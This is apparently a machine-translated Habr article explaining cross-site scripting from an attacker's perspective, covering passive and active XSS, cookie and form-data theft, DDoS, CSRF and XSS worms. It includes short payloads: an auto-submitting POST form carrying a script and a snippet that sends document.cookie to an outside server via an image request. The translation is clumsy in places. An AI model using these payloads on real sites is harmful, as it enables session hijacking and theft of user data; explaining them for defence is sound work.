Geekly Articles each Day
📜 ⬆️ ⬇️

XSS eyes of the attacker

What is XSS and how everyone will protect against it has long been known, so I will be brief. XSS is the ability of an attacker in a certain way (see the link to possible options at the end of the article) to integrate a script into the page of the victim site that will be executed when you visit it.

Interestingly, in most cases where this vulnerability is described, we are frightened by the following code:

  http://www.site.com/page.php?var= <script> alert ('xss'); </ script>

')
Somehow it is not very scary :) So how can this vulnerability really be dangerous?

Passive and active



There are two types of XSS vulnerabilities - passive and active.

An active vulnerability is more dangerous, since an attacker does not need to lure the victim through a special link; he only needs to inject the code into the database or some file on the server. Thus, all visitors to the site automatically become victims. It can be integrated, for example, using SQL Injection. Therefore, you should not trust the data stored in the database, even if they were processed during insertion.

An example of a passive vulnerability can be viewed at the very beginning of the article. There is already a need for social engineering, for example, an important letter from the site administration with a request to check your account settings, after restoring from backup. Accordingly, you need to know the address of the victim or simply arrange a spam mailing list or post a post on any forum, and it’s also not a fact that the victims will be naive and follow your link.

Moreover, both POST and GET-parameters can be subject to passive vulnerability. With POST-parameters, of course, will have to go to the tricks. For example, redirection from the site of the attacker.

  <form method = "post" action = "http://site.com/page.php">
   <input type = "hidden" name = "var" value = "<script> alert ('xss') </ script>">
 </ form>
 <script type = "text / javascript">
   document.getElementsByTagName ('form') [0] .submit ();
 </ script>


Therefore, GET-vulnerability is a bit more dangerous, because It is easier for the victim to notice the wrong domain than an additional parameter (although the url can be encoded altogether).

Theft Cookies



This is the most frequently cited example of a XSS attack. Cookies sometimes store some valuable information (sometimes even the username and password (or his hash) of the user), but the most dangerous is theft of an active session, so do not forget to click the "Logout" link on websites, even if it is a home computer. Fortunately, on most resources, the lifetime of the session is limited.

  var іmg = new Image ();
 іmg.src = 'http: //site/xss.php?'  + document.cookie;


Therefore, they imposed domain restrictions on XMLHttpRequest, but the attacker is not afraid, because there is <iframe>, <img>, <script>, background: url (); etc.

Data theft from forms



We are looking for a form through, for example, getElementById and we are tracking the onsubmit event. Now, before submitting the form, the entered data is also sent to the attacker's server.

This type of attack is a bit of a phishing attack, only a fake site is used, not a fake site, which causes a greater trust of the victim.

DDoS attack (distributed denial of service attack)



XSS vulnerability on multi-visited resources can be used to conduct DDoS attacks. The point is simple - a lot of requests that the attacked server cannot withstand.
Actually, the relation to XSS is indirect, since the scripts may not be used at all, a construction of the following form is sufficient:

  <img src = "http://site.com/">


Cross-site request forgery (CSRF / XSRF)



Also has an indirect relationship to XSS. In general, this is a separate type of vulnerability, but is often used in conjunction with XSS. The bottom line is that a user who is authorized on an invulnerable site visits a vulnerable (or a special attacker's page) from which a request is sent to perform certain actions.

Roughly speaking, ideally this should be the case. The user is authorized in the payment system. Then I went to an attacker's website or a website with a XSS vulnerability, from which a request was sent to transfer money to the attacker's account.

Therefore, when performing certain user actions (for example, changing e-mail), most websites ask for a password or ask for a confirmation code.

XSS Worms



This type of attack appeared, probably due to social networks, such as Vkontakte and Twitter. The point is that a link with an XSS vulnerability is sent to several users of the social network, when they click on the link, the integrated script sends messages to other users on their behalf, etc. At the same time, other actions may be performed, for example, sending personal data of victims to an attacker.

Harmless XSS



Interestingly, the counters are also in their essence a kind of active XSS attack. After all, data about the visitor is transmitted to a third-party server, such as its IP address, monitor resolution, etc. Only the code in your page you integrate of your own will :) Take a look, for example, at the Google Analytic code.

Cross-domain AJAX requests can also be considered innocuous XSS.

Related Links



  1. XSS Cheat Sheet - Many ways to integrate scripts, plus a bonus (text encoding and obfuscation of IP addresses).
  2. Description of XSS on Wikipedia
  3. DoS-attack VKontakte "Runet Awards"
  4. Peace XSS - variants of cross-domain AJAX requests.
  5. Cross-Site Request Forgery - a lot of noise because of nothing
  6. Xss for newbies
  7. Xss Advanced Cross-Site Scripting
  8. Cookie tampering
  9. XSS worm: who is less? - Competition for the minimum JavaScript code that will copy itself further.


UPD I advise you to read the comments - a lot of useful additions.

* Illustration taken from PHP presentation under Attack

Source: https://habr.com/ru/post/66057/

More articles:


All Articles